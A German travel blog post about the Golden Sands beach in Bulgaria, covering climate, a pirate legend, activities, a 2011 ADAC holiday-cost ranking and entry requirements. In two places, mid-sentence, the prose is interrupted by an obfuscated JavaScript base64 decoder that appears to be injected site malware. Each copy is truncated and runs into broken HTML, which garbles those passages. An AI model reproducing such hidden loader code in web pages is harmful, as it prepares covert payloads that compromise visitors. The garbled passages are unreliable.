Der Goldstrand in Bulgarien

Der Goldstrand in Bulgarien ist ca. dreieinhalb Kilometer lang. Durch feinen und goldschimmernden Sand zeichnet sich der bis zu hundert Meter breite Strand aus. Am Goldstrand scheint die Sonne von Mai bis Oktober, die Sommer sind lang und warm mit Temperaturen bis zu 27 Grad Celsius. Die Hauptsaison hier ist von Juni bis August. Für einen Badeurlaub sind die Monate Juli und August besonders geeignet, da dann die Wassertemperatur angenehme 24 Grad Celsius beträgt.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Bulgarien" src="http://www.marinda.de/wp-content/uploads/2011/05/goldstrand_bulgarien.jpg" alt="Sonnenaufgang am Goldstrand" width="600" height="450" />Sonnenaufgang am Goldstrand (Foto: © Sascha D / pixelio.de)

Der Name Goldstrand beruht auf einer alten Sage, nach der Piraten einen großen Goldschatz an der Küste, nördlich der Stadt Varna, vergraben haben. Die Piraten wurden von der Bevölkerung überwältigt und ihr Gold in einen wunderbaren Strand verwandelt.

In der Umgebung entspringen einige Mineralquellen, denen Heileigenschaften nachgesagt werden und die in den zahlreichen Fitness-Centern sehr geschätzt werden. An den wunderschönen Promenaden entlang dem Goldstrand reihen sich die Supermärkte, Hotels und Restaurants sowie großes Casino. Eine Besonderheit in Goldstrand ist der Übergang vom function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand">Strand zu den waldbedecken Abhängen. Um ein ganzjähriges Wohnen zu ermöglichen, werden hier in Goldstrand entlang dem Strand Luxusapartmenthäuser gebaut. Auch für Sportaktive ist Goldstrand ein Paradies. Hier werden Minigolf, Reiten, Tennis, Wassersport, Volleyball und vieles mehr günstig angeboten. Und auch sonst können sich die Preise sehen lassen.

Der ADAC hat im Mai 2011 in einer Studie die Urlaubsnebenkosten von 50 verschiedenen europäischen Badeorten verglichen. Den ersten Platz und damit die günstigsten Urlaubsnebenkosten gibt es nach der ADAC Studie in Bulgarien. Im Städteränking liegt der Goldstrand auf Platz 3. Besonders günstige sind die Preise für Essen & Trinken, Gesundheit & Körperpflege und Shopping. Auch die beliebten bulgarischen Urlaubsorte Sveti Konstantin (Platz 2), Albena (4), Obzor (5) und Sonnenstrand (10) sind in den Top 10 des Städterankings vertreten.

Da Bulgarien Mitgliedsstaat der EU ist, benötigen deutsche Staatsangehörige zur Einreise lediglich einen gültigen Personalausweis oder Reisepass. Kinder unter 16 Jahren müssen ebenfalls einen eigenen Ausweis oder Pass vorweisen. Die Ausweise bzw. Pässe müssen mindestens für die geplante Reisedauer gültig sein. Evtl. kann man auch bei www.lastminute-restplatzbörse.de noch eine günstige Reise nach Bulgarien finden.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg